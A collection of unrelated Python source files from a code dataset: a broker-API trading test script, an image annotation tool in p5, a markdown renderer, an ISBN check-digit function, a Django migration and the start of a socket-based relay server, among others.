order_type=OrderType.NORMAL,
adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
#查询今日订单 order_list_query
ret_code_order_list_query_hk, ret_data_order_list_query_hk = trade_hk.order_list_query(order_id="",
status_filter_list=[],
code='', start='',
end='',
trd_env=tradeEnv,
acc_id=0)
print('港股今日订单 ',ret_code_order_list_query_hk, ret_data_order_list_query_hk)
ret_code_order_list_query_us, ret_data_order_list_query_us = trade_us.order_list_query(order_id="",
status_filter_list=[],
code='', start='',
end='',
trd_env=tradeEnv,
acc_id=0)
print('美股今日订单 ',ret_code_order_list_query_us, ret_data_order_list_query_us)
ret_code_order_list_query_cn, ret_data_order_list_query_cn = trade_cn.order_list_query(order_id="",
status_filter_list=[],
code='', start='',
end='',
trd_env=tradeEnv,
acc_id=0)
print('A股今日订单 ',ret_code_order_list_query_cn, ret_data_order_list_query_cn)
# 修改订单modify_order
order_ids_hk = ret_data_order_list_query_hk.data['order_id'].tolist()
order_ids_us = ret_data_order_list_query_us.data['order_id'].tolist()
order_ids_cn = ret_data_order_list_query_cn.data['order_id'].tolist()
for order_id_hk in order_ids_hk:
#港股-修改订单数量/价格
print('港股改单,order_id = ',order_id_hk)
print(trade_hk.modify_order(modify_order_op=ModifyOrderOp.NORMAL, order_id=order_id_hk , qty=qty_hk*2, price=price_hk-1, adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
time.sleep(2)
#撤单
print('港股撤单,order_id = ', order_id_hk)
print(trade_hk.modify_order(modify_order_op=ModifyOrderOp.CANCEL, order_id=order_id_hk, qty=0, price=0, adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
for order_id_us in order_ids_us:
#美股-修改订单数量/价格
print('美股改单,order_id = ',order_id_us)
print(trade_us.modify_order(modify_order_op=ModifyOrderOp.NORMAL, order_id=order_id_us , qty=qty_us*2, price=price_us-1, adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
time.sleep(2)
#撤单
print('美股撤单,order_id = ', order_id_us)
print(trade_us.modify_order(modify_order_op=ModifyOrderOp.CANCEL, order_id=order_id_us, qty=0, price=0, adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
for order_id_cn in order_ids_cn:
#A股-修改订单数量/价格
print('A股改单,order_id = ',order_id_cn)
print(trade_cn.modify_order(modify_order_op=ModifyOrderOp.NORMAL, order_id=order_id_cn , qty=qty_cn*2, price=price_cn-1, adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
time.sleep(2)
#撤单
print('A股撤单,order_id = ', order_id_cn)
print(trade_cn.modify_order(modify_order_op=ModifyOrderOp.CANCEL, order_id=order_id_cn, qty=0, price=0, adjust_limit=0,
trd_env=tradeEnv, acc_id=0))
#查询账户信息 accinfo_query
print('HK 账户信息')
print(trade_hk.accinfo_query(trd_env=tradeEnv, acc_id=0))
print('US 账户信息')
print(trade_us.accinfo_query(trd_env=tradeEnv, acc_id=0))
print('CN 账户信息')
print(trade_cn.accinfo_query(trd_env=tradeEnv, acc_id=0))
#查询持仓列表 position_list_query
print('HK 持仓列表')
print(trade_hk.position_list_query( code='', pl_ratio_min=None, pl_ratio_max=None, trd_env=tradeEnv, acc_id=0))
print('US 持仓列表')
print(trade_us.position_list_query(code='', pl_ratio_min=None, pl_ratio_max=None, trd_env=tradeEnv, acc_id=0))
print('CN 持仓列表')
print(trade_cn.position_list_query(code='', pl_ratio_min=None, pl_ratio_max=None, trd_env=tradeEnv, acc_id=0))
#查询历史订单列表 history_order_list_query
print('HK 历史订单列表')
print(trade_hk.history_order_list_query(status_filter_list=[], code='', start='', end='',
trd_env=tradeEnv, acc_id=0))
print('US 历史订单列表')
print(trade_us.history_order_list_query(status_filter_list=[], code='', start='', end='',
trd_env=tradeEnv, acc_id=0))
print('CN 历史订单列表')
print(trade_cn.history_order_list_query(status_filter_list=[], code='', start='', end='',
trd_env=tradeEnv, acc_id=0))
#查询今日成交列表 deal_list_query
print('HK 今日成交列表')
print(trade_hk.deal_list_query(code="", trd_env=tradeEnv, acc_id=0))
print('US 今日成交列表')
print(trade_us.deal_list_query(code="", trd_env=tradeEnv, acc_id=0))
print('CN 今日成交列表')
print(trade_cn.deal_list_query(code="", trd_env=tradeEnv, acc_id=0))
#查询历史成交列表 history_deal_list_query
print('HK 历史成交列表')
print(trade_hk.history_deal_list_query(code = '', start='', end='', trd_env=tradeEnv, acc_id=0))
print('US 历史成交列表')
print(trade_us.history_deal_list_query(code='', start='', end='', trd_env=tradeEnv, acc_id=0))
print('CN 历史成交列表')
print(trade_cn.history_deal_list_query(code='', start='', end='', trd_env=tradeEnv, acc_id=0))
class CurKlineTest(CurKlineHandlerBase):
'''获取实时K线 get_cur_kline 和 CurKlineHandlerBase'''
def on_recv_rsp(self, rsp_pb):
ret_code, ret_data = super(CurKlineTest, self).on_recv_rsp(rsp_pb)
# 打印,记录日志
print('CurKlineHandlerBase ', ret_code)
print(ret_data)
return RET_OK, ret_data
class OrderBookTest(OrderBookHandlerBase):
def on_recv_rsp(self, rsp_pb):
ret_code, ret_data = super(OrderBookTest, self).on_recv_rsp(rsp_pb)
# 打印
print('OrderBookHandlerBase ', ret_code)
print(ret_data)
return RET_OK, ret_data
class RTDataTest(RTDataHandlerBase):
def on_recv_rsp(self, rsp_pb):
ret_code, ret_data = super(RTDataTest, self).on_recv_rsp(rsp_pb)
# 打印信息
print('RTDataHandlerBase ', ret_code)
print(ret_data)
return RET_OK, ret_data
class TickerTest(TickerHandlerBase):
'''获取逐笔 get_rt_ticker 和 TickerHandlerBase'''
def on_recv_rsp(self, rsp_pb):
ret_code, ret_data = super(TickerTest, self).on_recv_rsp(rsp_pb)
# 打印
print('TickerHandlerBase ', ret_code)
print(ret_data)
return RET_OK, ret_data
class StockQuoteTest(StockQuoteHandlerBase):
# 获取报价get_stock_quote和StockQuoteHandlerBase
def on_recv_rsp(self, rsp_str):
ret_code, ret_data = super(StockQuoteTest, self).on_recv_rsp(
rsp_str) # 基类的on_recv_rsp方法解包返回了报价信息,格式与get_stock_quote一样
# 打印
print('StockQuoteTest ', ret_code)
print(ret_data)
return RET_OK, ret_data
class BrokerTest(BrokerHandlerBase):
def on_recv_rsp(self, rsp_pb):
ret_code, stock_code, ret_data = super(BrokerTest, self).on_recv_rsp(rsp_pb)
# 打印
print('BrokerHandlerBase ', ret_code)
print(stock_code)
print(ret_data)
return RET_OK, ret_data
class TradeOrderTest(TradeOrderHandlerBase):
'''订单状态推送'''
def on_recv_rsp(self, rsp_pb):
ret_code,ret_data = super(TradeOrderTest, self).on_recv_rsp(rsp_pb)
print('TradeOrderHandlerBase ret_code = %d, ret_data = \n%s'%(ret_code,str(ret_data)))
return RET_OK,ret_data
class TradeDealTest(TradeDealHandlerBase):
'''订单成交推送 '''
def on_recv_rsp(self, rsp_pb):
ret_code,ret_data = super(TradeDealTest, self).on_recv_rsp(rsp_pb)
print('TradeDealHandlerBase ret_code = %d, ret_data = \n%s' % (ret_code,str(ret_data)))
return RET_OK,ret_data
if __name__ == '__main__':
aa = ALLApi()
aa.test_quotation()
aa.test_quotation_async()
aa.test_trade_real()
aa.test_trade_simulate()
|
StarcoderdataPython
|
3320771
|
from operator import itemgetter
class ColorsForCounts(object):
"""
Maintain a collection of count thresholds and colors with methods to get a
color or a CSS name for a count.
@param colors: An C{iterable} of space separated "value color" strings,
such as ["100 red", "200 rgb(23, 190, 207)", "700 #CF3CF3"]. Or C{None}
if no colors (other than C{defaultColor}) should be used.
@param defaultColor: The C{str} color to use for counts that do not reach
the lowest count threshold for any color in C{colors}.
@raise ValueError: If an incorrect count/color pair is found in C{colors}.
"""
def __init__(self, colors, defaultColor='black'):
thresholds = set()
result = []
if colors:
for colorInfo in colors:
fields = colorInfo.split(None, 1)
if len(fields) == 2:
threshold, color = fields
try:
threshold = int(threshold)
except ValueError:
raise ValueError(
'color arguments must be given as space-separated '
'pairs of "count color" where the count is an '
'integer threshold. Your value (%r) was not '
'an integer.' % threshold)
if threshold < 0:
raise ValueError(
'color arguments must be given as space-separated '
'pairs of "count color" where the count is '
'non-negative. Your value (%r) is less than 0.' %
threshold)
if threshold in thresholds:
raise ValueError(
'repeated color argument count (%d).' % threshold)
result.append((threshold, color))
thresholds.add(threshold)
else:
raise ValueError(
'color arguments must be given as space-separated '
'pairs of "value color". Your value (%r) does not '
'contain a space.' % colorInfo)
result.sort(key=itemgetter(0), reverse=True)
if not result or result[-1][0] > 0:
result.append((0, defaultColor))
self.colors = tuple(result)
def thresholdToCssName(self, threshold):
"""
Turn a count threshold into a string that can be used as a CSS
class name.
@param threshold: The C{int} threshold.
@raise ValueError: If the threshold is not an C{int}.
@return: A C{str} CSS class name.
"""
return 'threshold-%d' % threshold
def thresholdForCount(self, count):
"""
Get the best threshold for a specific count.
@param count: An C{int} count.
@return: The first C{int} threshold that the given count is at least
as big as.
"""
assert count >= 0, 'Count (%d) cannot be negative.' % count
for threshold, _ in self.colors:
if count >= threshold:
return threshold
raise ValueError('This should never happen! Last threshold is not 0?')
def colorForCount(self, count):
"""
Get the color for a count.
@param count: An C{int} count.
@return: The C{str} color for the count.
"""
assert count >= 0, 'Count (%d) cannot be negative.' % count
for threshold, color in self.colors:
if count >= threshold:
return color
raise ValueError('This should never happen! Last threshold is not 0?')
|
StarcoderdataPython
|
1603576
|
from polygraphy.tools.inspect.subtool.model import Model
from polygraphy.tools.inspect.subtool.data import Data
|
StarcoderdataPython
|
1735464
|
# author: <NAME>
from p5 import *
import sympy as sym
import mpmath as mp
import numpy as np
from tkinter import Tk
from scipy.spatial import distance
import PIL
from PIL import Image
import argparse
import os
import csv
import mimetypes
DEBUG = False
parser = argparse.ArgumentParser(
description='Custom frame annotator implemented in p5 and python.')
parser.add_argument('--input', dest='input',
help='Path to the directory with the input images', required=False, type=str, default='input/'),
parser.add_argument('--output', dest='output',
help='Path to the directory with the output images', required=False, type=str, default='output/'),
parser.add_argument('--cache', dest='cache',
help='Path to the cache directory (DON\'T INCLUDE \\)', required=False, type=str, default='cache'),
parser.add_argument('--scale', dest='scale',
help='scaling factor for viewing images', required=False, type=float, default=0.3),
root = Tk()
width = root.winfo_screenwidth()
height = root.winfo_screenheight()
window_offset = 200
image_width = width - window_offset
image_height = (height/width) * image_width
args = parser.parse_args()
input_dir = args.input
output_dir = args.output
cache_dir = args.cache
dirs = []
images = []
img_size = []
index = 0
points = []
c_points = []
lines = []
rectangles = []
p_colors = []
l_colors = []
last_action = 'script started'
std_color = Color(255, 255, 255) # white
a_color = Color(255, 0, 0) # azure
b_color = Color(0, 255, 0) # rose
c_color = Color(0, 0, 255) # pastel orange
def validate_dirs():
global DEBUG, input_dir, output_dir, cache_dir
dir_list = [input_dir, output_dir, cache_dir]
for directory in dir_list:
if not os.path.exists(directory):
os.makedirs(directory)
if DEBUG:
print('[validate_dirs] Validated Directories')
def load():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
validate_dirs()
load_images_from_folder(input_dir)
rectangles = load_bbox_from_file()
last_action = 'loaded images'
def setup():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
size(width - window_offset, image_height)
title('Light-notator')
last_action = 'setup window'
no_loop()
rect_mode(mode='CENTER')
def check_index():
global index
if index > len(images) - 1:
index = 0
if index < 0:
index = len(images) - 1
def draw():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
background(255)
check_index()
image(images[index], (0, 0), (image_width, image_height))
text(f'index: {index}', (5, 5))
text(f'current image: ({dirs[index]})', (5, 15))
text(f'# points: {len(points)}', (5, 25))
text(f'last action: ({last_action})', (5, 35))
for m_rectangle in rectangles:
no_fill()
stroke_weight(2)
stroke(117, 255, 117)
x_translate = floor(m_rectangle[0] * img_size[index][0])
y_translate = floor(m_rectangle[1] * img_size[index][1])
rect_width = floor(m_rectangle[2] * img_size[index][0])
rect_height = floor(m_rectangle[3] * img_size[index][1])
translate(x_translate, y_translate)
rotate(m_rectangle[4])
rect((0, 0), rect_width, rect_height)
rotate(-1 * m_rectangle[4])
translate(-1 * x_translate, -1 * y_translate)
color_index = 0
for m_point in points:
fill(p_colors[color_index])
stroke_weight(1)
stroke(41)
ellipse((m_point[0], m_point[1]), 5, 5)
color_index += 1
color_index = 0
for m_line in lines:
fill(l_colors[color_index])
line(m_line[0], m_line[1])
color_index += 1
fill(std_color)
def mouse_pressed():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
if DEBUG:
print(f'mouse pressed at ({mouse_x},{mouse_y})')
add_point(mouse_x, mouse_y, std_color)
constrain_square()
redraw()
def key_pressed():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
if ((key == 'R') or (key == 'r')):
remove_point()
if ((key == 'c') or (key == 'C')):
points = []
lines = []
rectangles = []
p_colors = []
l_colors = []
last_action = 'cleared all points'
if (key == 'd'):
redraw()
if (key == "2"):
last_action = 'moved to next frame'
write_bbox_to_file()
index += 1
check_index()
rectangles = load_bbox_from_file()
if (key == "1"):
last_action = 'moved to previous frame'
write_bbox_to_file()
index -= 1
check_index()
rectangles = load_bbox_from_file()
redraw()
def load_images_from_folder(folder):
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
for filename in os.listdir(folder):
img_dir = os.path.join(folder, filename)
file_type = str(mimetypes.guess_type(img_dir)[0])[0:5]
if file_type == 'image':
temp_img = Image.open(img_dir)
wsize = int((float(temp_img.size[0]) * float(args.scale)))
hsize = int((float(temp_img.size[1]) * float(args.scale)))
temp_img = temp_img.resize((wsize, hsize), PIL.Image.ANTIALIAS)
new_dir = os.path.join(args.cache, filename)
temp_img.save(f'{new_dir}')
img_size.append((image_width, image_height))
dirs.append(new_dir)
images.append(load_image(new_dir))
dirs, images, img_size = (list(t)
for t in zip(*sorted(zip(dirs, images, img_size))))
def add_point(in_x, in_y, color):
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
if in_x <= image_width and in_y <= image_height:
points.append((in_x, in_y))
p_colors.append(color)
last_action = 'added point'
def add_line(temp_point_0, temp_point_1, color):
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
lines.append((temp_point_0, temp_point_1))
l_colors.append(Color(0, 0, 0))
def constrain_square():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
if len(points) == 3:
dist = []
pairs = []
for pointA in points:
for pointB in points:
dist.append(abs(distance.euclidean(pointA, pointB)))
pairs.append((pointA, pointB))
for point in points:
# arbitrarily define temporary points in order to find pointC
if not ((point == pairs[dist.index(max(dist))][0]) or (point == pairs[dist.index(max(dist))][1])):
pointC = point
hypot = max(dist)
temp_distance_0 = abs(distance.euclidean(
pointC, pairs[dist.index(max(dist))][0]))
temp_distance_1 = abs(distance.euclidean(
pointC, pairs[dist.index(max(dist))][1]))
if (temp_distance_0 > temp_distance_1):
pointA = pairs[dist.index(max(dist))][0]
pointB = pairs[dist.index(max(dist))][1]
angle_flip = False
else:
pointA = pairs[dist.index(max(dist))][1]
pointB = pairs[dist.index(max(dist))][0]
angle_flip = True
if DEBUG:
p_colors[points.index(pointA)] = a_color
p_colors[points.index(pointB)] = b_color
p_colors[points.index(pointC)] = c_color
leg1 = abs(distance.euclidean(pointC, pointA))
hypot = abs(distance.euclidean(pointB, pointA))
leg1_vector = (pointC[0] - pointA[0], pointC[1] - pointA[1])
hypot_vector = (pointB[0] - pointA[0], pointB[1] - pointA[1])
if DEBUG:
add_line(pointA, pointB, std_color)
print(
f'leg vector is {leg1_vector} and hyp_vector is {hypot_vector}')
print(
f'pointA is {pointA} and pointB is {pointB} and pointC is {pointC}')
theta = sym.acos(
(leg1_vector[0]*hypot_vector[0]+leg1_vector[1]*hypot_vector[1])/(leg1*hypot))
std_unit_vector = (1, 0)
theta_prime = sym.acos((leg1_vector[0]*std_unit_vector[0] +
leg1_vector[1]*std_unit_vector[1])/(leg1))
leg2 = leg1 * mp.tan(theta)
increment = (leg2 * mp.sin(theta_prime),
leg2 * mp.cos(theta_prime))
temp_b_check = pointB[0] > pointA[0]
if pointC[1] > pointA[1]:
increment = (-1 * increment[0], increment[1])
if not (temp_b_check == (float(pointC[0] + increment[0]) > pointA[0])):
increment = (-1 * increment[0], -1 * increment[1])
third_point = (float(pointC[0] + increment[0]),
float(pointC[1] + increment[1]))
points[points.index(pointB)] = third_point
pointB = third_point
pointD = (float(pointA[0] + increment[0]),
float(pointA[1] + increment[1]))
add_point(pointD[0], pointD[1], std_color)
validate_constraint()
angle_factor = -1
rectangle_tilt = get_angle([pointC[0], pointC[1]], [pointA[0], pointA[1]], [
pointA[0] + 20, pointA[1]])
if DEBUG:
print(f'rectangle tilt is: {180 * rectangle_tilt / mp.pi}')
rectangle_tilt *= angle_factor
if DEBUG:
print(f'shifted rectangle tilt is: {180 * rectangle_tilt / mp.pi}')
rectangle_width = abs(distance.euclidean(pointC, pointA))
rectangle_height = abs(distance.euclidean(pointD, pointA))
averageX = 0
averageY = 0
for point in points:
averageX += point[0]
averageY += point[1]
averageX /= len(points)
averageY /= len(points)
add_rectangle(averageX, averageY, rectangle_width,
rectangle_height, rectangle_tilt)
points = []
else:
last_action = 'constrain_square failed: not enough points'
lines = []
def add_rectangle(in_x, in_y, rectangle_width, rectangle_height, rectangle_tilt):
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
x_relative = in_x/img_size[index][0]
y_relative = in_y/img_size[index][1]
rect_width_relative = rectangle_width/img_size[index][0]
rect_height_relative = rectangle_height/img_size[index][1]
rectangles.append((x_relative, y_relative, rect_width_relative,
rect_height_relative, rectangle_tilt))
def validate_constraint():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
angles = []
for pointA in points:
for pointB in points:
if pointB == pointA:
continue
for pointC in points:
if pointC == pointA or pointC == pointB:
continue
angle = 180 * get_angle(pointA, pointB, pointC) / np.pi
if angle == 90 or (angle > 89.9 and angle < 90.1):
angles.append(angle)
if DEBUG:
print(f'validated constraints: corner angles are {angles[0:4]}')
def get_angle(pointA, pointB, pointC):
v1 = [pointA[0] - pointB[0], pointA[1] - pointB[1]]
v2 = [pointC[0] - pointB[0], pointC[1] - pointB[1]]
angle = np.arccos(
np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2)))
if pointA[1] > pointC[1]:
angle *= -1
return angle
def remove_point():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
curr_pos = (mouse_x, mouse_y)
dist = []
for point in points:
dist.append(distance.euclidean(point, curr_pos))
points.pop(dist.index(min(dist)))
last_action = 'removed closest point'
constrain_square()
def load_bbox_from_file():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
file_dir = dirs[index].replace('cache', 'input')
file_dir = os.path.splitext(file_dir)[0]+'.csv'
if os.path.isfile(file_dir):
temp_rectangles = []
if DEBUG:
print('There are encoded annotations in corresponding text file.')
with open(file_dir) as csvfile:
readCSV = csv.reader(csvfile, delimiter=',')
for row in readCSV:
if not (row == []):
temp_rectangles.append(
(float(row[0]), float(row[1]), float(row[2]), float(row[3]), float(row[4])))
return temp_rectangles
else:
if DEBUG:
print('There are no encoded annotations in corresponding text file.')
return []
def write_bbox_to_file():
global DEBUG, last_action, points, dirs, images, img_size, index, input_dir, output_dir, args, width, height, image_width, image_height, lines, p_colors, l_colors, a_color, b_color, c_color, rectangles
file_dir = dirs[index].replace('cache', 'input')
file_dir = os.path.splitext(file_dir)[0]+'.csv'
if os.path.isfile(file_dir):
os.remove(file_dir)
with open(file_dir, 'w') as csvfile:
filewriter = csv.writer(csvfile, delimiter=',',
quotechar='|', quoting=csv.QUOTE_MINIMAL)
for m_rectangle in rectangles:
tmp_lst = [m_rectangle[0], m_rectangle[1],
m_rectangle[2], m_rectangle[3], m_rectangle[4]]
filewriter.writerow(tmp_lst)
if __name__ == '__main__':
load()
run()
|
StarcoderdataPython
|
3328353
|
<gh_stars>0
# Generated by Django 2.0.9 on 2019-01-21 15:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('oauth2_provider', '0008_auto_20181115_1642'),
]
operations = [
migrations.AlterField(
model_name='grant',
name='redirect_uri',
field=models.CharField(max_length=1024),
),
]
|
StarcoderdataPython
|
3215441
|
<gh_stars>10-100
import torch.utils.data as data
from PIL import Image
import torchvision.transforms as transforms
class BaseDataset(data.Dataset):
def __init__(self):
super(BaseDataset, self).__init__()
def name(self):
return 'BaseDataset'
def initialize(self, opt):
pass
def get_transform(opt):
transform_list = []
if opt.resize_or_crop == 'resize_and_crop':
osize = [opt.loadSizeX, opt.loadSizeY]
transform_list.append(transforms.Scale(osize, Image.BICUBIC))
transform_list.append(transforms.RandomCrop(opt.fineSize))
elif opt.resize_or_crop == 'crop':
transform_list.append(transforms.RandomCrop(opt.fineSize))
elif opt.resize_or_crop == 'scale_width':
transform_list.append(transforms.Lambda(
lambda img: __scale_width(img, opt.fineSize)))
elif opt.resize_or_crop == 'scale_width_and_crop':
transform_list.append(transforms.Lambda(
lambda img: __scale_width(img, opt.loadSizeX)))
transform_list.append(transforms.RandomCrop(opt.fineSize))
if opt.isTrain and not opt.no_flip:
transform_list.append(transforms.RandomHorizontalFlip())
transform_list += [transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5),
(0.5, 0.5, 0.5))]
return transforms.Compose(transform_list)
def __scale_width(img, target_width):
ow, oh = img.size
if (ow == target_width):
return img
w = target_width
h = int(target_width * oh / ow)
return img.resize((w, h), Image.BICUBIC)
|
StarcoderdataPython
|
4841002
|
<gh_stars>1-10
def get_legal_isbn(isbn):
if len(isbn) == 10:
return cal_10bit_isbn(isbn)
elif len(isbn) == 13:
return cal_13bit_isbn(isbn)
return False
def cal_10bit_isbn(isbn):
sum = 0
for i in range(9):
sum += (10 - i) * (ord(isbn[i]) - ord('0'))
n = sum % 11
if n == 10:
end = 'X'
elif n == 11:
end = '0'
else:
end = str(n)
return isbn[:9] + end
def cal_13bit_isbn(isbn):
sum = 0
for i in range(0, 11, 2):
sum += ord(isbn[i]) - ord('0')
for i in range(1, 13, 2):
sum += 3 * (ord(isbn[i]) - ord('0'))
return isbn[:12] + str((10 - sum % 10) % 10)
if __name__ == "__main__":
print(get_legal_isbn("9787302555541"))
|
StarcoderdataPython
|
1638414
|
<reponame>Hoto-Cocoa/openNAMU<filename>route/tool/set_mark/markdown.py
from . import tool
import datetime
import html
import re
class head_render:
def __init__(self):
self.head_level = [0, 0, 0, 0, 0, 0]
self.toc_data = '' + \
'<div id="toc">' + \
'<span id="toc_title">TOC</span>' + \
'<br>' + \
'<br>' + \
''
self.toc_num = 0
def __call__(self, match):
head_len_num = len(match[1])
head_len = str(head_len_num)
head_len_num -= 1
head_data = match[2]
self.head_level[head_len_num] += 1
for i in range(head_len_num + 1, 6):
self.head_level[i] = 0
self.toc_num += 1
toc_num_str = str(self.toc_num)
head_level_str_2 = '.'.join([str(i) for i in self.head_level if i != 0])
head_level_str = head_level_str_2 + '.'
self.toc_data += '<a href="#s-' + head_level_str_2 + '">' + head_level_str + '</a> ' + head_data + '<br>'
return '<h' + head_len + ' id="s-' + head_level_str_2 + '"><a href="#toc">' + head_level_str + '</a> ' + head_data + '</h' + head_len + '>'
def get_toc(self):
return self.toc_data + '</div>'
class link_render:
def __init__(self, plus_data, include_name):
self.str_e_link_id = 0
self.plus_data = ''
self.include_name = include_name
def __call__(self, match):
str_e_link_id = str(self.str_e_link_id)
self.str_e_link_id += 1
if match[1] == '!':
file_name = ''
if re.search(r'^http(s)?:\/\/', match[3], flags = re.I):
file_src = match[3]
file_alt = match[3]
exist = '1'
else:
file_name = re.search(r'^([^.]+)\.([^.]+)$', match[3])
if file_name:
file_end = file_name.group(2)
file_name = file_name.group(1)
else:
file_name = 'Test'
file_end = 'jpg'
file_src = '/image/' + tool.sha224_replace(file_name) + '.' + file_end
file_alt = 'file:' + file_name + '.' + file_end
exist = None
return '' + \
'<span class="' + self.include_name + 'file_finder" ' + \
'under_alt="' + file_alt + '" ' + \
'under_src="' + file_src + '" ' + \
'under_style="" ' + \
'under_href="' + ("out_link" if exist else '/upload?name=' + tool.url_pas(file_name)) + '">' + \
'</span>' + \
''
else:
if re.search(r'^http(s)?:\/\/', match[3], flags = re.I):
self.plus_data += '' + \
'document.getElementsByName("' + self.include_name + 'set_link_' + str_e_link_id + '")[0].href = ' + \
'"' + match[3] + '";' + \
'\n' + \
''
return '<a id="out_link" ' + \
'href="" ' + \
'name="' + self.include_name + 'set_link_' + str_e_link_id + '">' + match[2] + '</a>'
else:
self.plus_data += '' + \
'document.getElementsByName("' + self.include_name + 'set_link_' + str_e_link_id + '")[0].href = ' + \
'"/w/' + tool.url_pas(match[3]) + '";' + \
'\n' + \
''
self.plus_data += '' + \
'document.getElementsByName("' + self.include_name + 'set_link_' + str_e_link_id + '")[0].title = ' + \
'"' + match[3] + '";' + \
'\n' + \
''
return '<a class="' + self.include_name + 'link_finder" ' + \
'title="" ' + \
'href="" ' + \
'name="' + self.include_name + 'set_link_' + str_e_link_id + '">' + match[2] + '</a>'
def get_plus_data(self):
return self.plus_data
def markdown(conn, data, title, include_name):
backlink = []
include_name = include_name + '_' if include_name else ''
plus_data = '' + \
'get_link_state("' + include_name + '");\n' + \
'get_file_state("' + include_name + '");\n' + \
''
data = html.escape(data)
data = data.replace('\r\n', '\n')
data = '\n' + data
head_r = r'\n(#{1,6}) ?([^\n]+)'
head_do = head_render()
data = re.sub(head_r, head_do, data)
data = head_do.get_toc() + data
link_r = r'(!)?\[((?:(?!\]\().)+)\]\(([^\]]+)\)'
link_do = link_render(plus_data, include_name)
data = re.sub(link_r, link_do, data)
plus_data = link_do.get_plus_data() + plus_data
data = re.sub(r'\*\*(?P<A>(?:(?!\*\*).)+)\*\*', '<b>\g<A></b>', data)
data = re.sub(r'__(?P<A>(?:(?!__).)+)__', '<i>\g<A></i>', data)
data = re.sub('^\n', '', data)
data = data.replace('\n', '<br>')
data = re.sub(r'(?P<A><\/h[0-6]>)<br>', '\g<A>', data)
return [data, plus_data, backlink]
|
StarcoderdataPython
|
4838992
|
<gh_stars>1-10
#!/usr/bin/env python3
import socket
import threading
import asyncio
import time
from message import Message
import TorzelaUtils as TU
# Initialize a class specifically for the round info.
# This class will track if a round is currently ongoing or not, the
# actual identifying number of the round, the time it ended, and the lock
# (so that no other messages are sent during the time of the round)
class RoundInfo:
def __init__(self, newRound, endTime):
self.open = True
self.round = newRound
self.endTime = endTime
class FrontServer:
# Set the IP and Port of the next server. Also set the listening port
# for incoming connections. The next server in the chain can
# be a Middle Server or even a Spreading Server
def __init__(self, nextServerIP, nextServerPort, localPort):
self.nextServerIP = nextServerIP
self.nextServerPort = nextServerPort
self.localPort = localPort
# Initialize round variables. This will allow us to track what
# current round the server is on, in addition to the state that the
# previous rounds are in
self.roundID = 1
self.rounds = {}
self.lock = asyncio.Lock()
self.roundDuration = 2
self.currentRound = ""
# This will allow us to associate a client with it's public key
# So that we can figure out which client should get which packet
# Entries are in the form
# ((<IP>,<Port>), <Public Key>) (i.e. (('localhost', 80), "mykey") )
# where <IP> is the client's IP address, <Port> is the client's
# listening port, and <Public Key> is the client's public key
self.clientList = []
# These arrays hold their information during each round. Position i-th
# of each array represents their respective data:
# key ; (ip, port) ; message -- respectively
# for the message that arrived the i-th in the current round.
self.clientLocalKeys = []
self.clientMessages = []
self.clientPublicKeys = []
# The server keys
self.__privateKey, self.publicKey = TU.generateKeys(
TU.createKeyGenerator() )
# We need to spawn off a thread here, else we will block
# the entire program
threading.Thread(target=self.setupConnection, args=()).start()
# Setup main listening socket to accept incoming connections
threading.Thread(target=self.listen, args=()).start()
# Create a new thread to handle the round timings
threading.Thread(target=self.manageRounds, args=()).start()
def getPublicKey(self):
return self.publicKey
def setupConnection(self):
# Before we can connect to the next server, we need
# to send a setup message to the next server
setupMsg = Message()
setupMsg.setType(0)
setupMsg.setPayload("{}".format(self.localPort))
self.connectionMade = False
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
while not self.connectionMade:
try:
sock.connect((self.nextServerIP, self.nextServerPort))
sock.sendall(str.encode(str(setupMsg)))
self.connectionMade = True
except:
# Put a delay here so we don't burn CPU time
time.sleep(1)
sock.close()
print("FrontServer successfully connected!")
# This is where all messages are handled
def listen(self):
# Wait until we have connected to the next server
while not self.connectionMade:
time.sleep(1)
# Listen for incoming connections
self.listenSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.listenSock.bind(('localhost', self.localPort))
self.listenSock.listen(10) # buffer 10 connections
while True:
print("FrontServer awaiting connection")
conn, client_addr = self.listenSock.accept()
